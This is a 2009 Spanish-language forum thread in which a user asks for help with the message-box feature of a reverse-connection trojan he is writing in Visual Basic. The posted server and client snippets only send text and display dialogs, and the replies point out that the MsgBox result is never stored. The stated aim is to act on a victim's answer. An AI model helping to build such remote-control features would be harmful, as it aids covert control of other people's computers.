elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  resultado msgbox en server
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: resultado msgbox en server  (Leído 1,764 veces)
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
resultado msgbox en server
« en: 12 Junio 2009, 02:52 am »

Hola a todos, estuve haciendo un programita en estos ultimos días, pero me choque con un problema.
El programa es un troyano cliente-servidor (inverso), y una de sus funciones es mandar mensajes con: si,no,cancelar...si no y otra sin nada..y con la respuesta de la victima ejecutar algo (despues veo bien qué)

supongo que ya entendieron maso menos la idea
parte del codigo del server

Código
  1. Private Sub server_DataArrival(ByVal bytesTotal As Long)
  2. Dim datos As String
  3. Dim Data() As String
  4.  
  5. server.GetData datos
  6.  
  7. Select Case LCase(Split(datos, "|")(0))
  8.  
  9. Case LCase("mensaje")
  10.  
  11. '''''''''''''
  12.  
  13.  
  14. If (Split(datos, "|")(2)) = 1 Then
  15.        MsgBox Split(datos, "|")(1), vbYesNoCancel, Split(datos, "|")(3)
  16.     '''''
  17. ElseIf (Split(datos, "|")(4)) = 1 Then
  18. MsgBox Split(datos, "|")(1), vbYesNo, Split(datos, "|")(3) = vbYes ' aca no se como haceeeeeeeer!!
  19.  
  20. ''''''''''''
  21.  
  22. Else
  23. MsgBox Split(datos, "|")(1), vbOKOnly, Split(datos, "|")(3)
  24.  
  25. End If
  26. ''''''''''''
  27. End Select
  28.  
  29. End Sub

cliente :
Código
  1. Private Sub Command1_Click()
  2. Dim datos As String
  3. Dim datos1 As String
  4. Dim mensajes As String
  5. Dim titulo As String
  6. datos1 = Check1.Value
  7. mensajes = Text1.Text
  8. titulo = Text4.Text
  9. datos = "mensaje|" & Text1.Text & "|" & Check1.Value & "|" & Text4.Text & "|" & Check2.Value & "|" & Option1.Value
  10.  
  11.  
  12. ws.SendData datos
  13.  
  14. End Sub

la conexión esta bien no pongo el resto del código porque ahí  no hay problema.

Adios y Muchas Gracias


En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: resultado msgbox en server
« Respuesta #1 en: 12 Junio 2009, 03:02 am »

si usas Split debes de saber el formato de la cadena enviada y en que lugar estan los "X" Datos a interpretar, no es difici y no importa si es conexión inversa, Reversa, Baja o Subida...¡! ESO NO importa,... lo que realmente importa al mandar información es la estructura de esta, te recomiendo que imprimas la cadena enviada en la ventana inmediato y por ende las separaciónes y revises como te llegan (aun que esto deberias saberlo pues lo mandas con anterioridad, pero es solo apra rectificar tu información¡!)

Para imprimir en pantalla inmediato:
Código
  1. Debug.print variable
  2.  

---------------------------------

Ahora con lo de tu linea:

Código
  1. MsgBox Split(datos, "|")(1), vbYesNo, Split(datos, "|")(3) = vbYes ' aca no se como haceeeeeeeer!!
  2.  

mas explisitamente este pedaso:

Código
  1. Split(datos, "|")(3) = vbYes
  2.  

APARECERA COMO TITULO VERDADERO O FALSE SEGUNS EA EL CASO, ya que estas asiendo el if mas sencillo...¡!


« Última modificación: 12 Junio 2009, 03:05 am por ░▒▓BlackZeroҖ▓▒░ » En línea

The Dark Shadow is my passion.
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: resultado msgbox en server
« Respuesta #2 en: 12 Junio 2009, 03:10 am »

El problema esta en que muestras un mensaje y obtienes un valor como respuesta, pero ese valor no esta asignado a NADA, no se almacena en ninguna variable  :rolleyes:
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Fallo en textbox+msgbox resultado todo junto ¿porque?
.NET (C#, VB.NET, ASP)
dega1980 3 3,098 Último mensaje 30 Marzo 2014, 12:15 pm
por dega1980
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines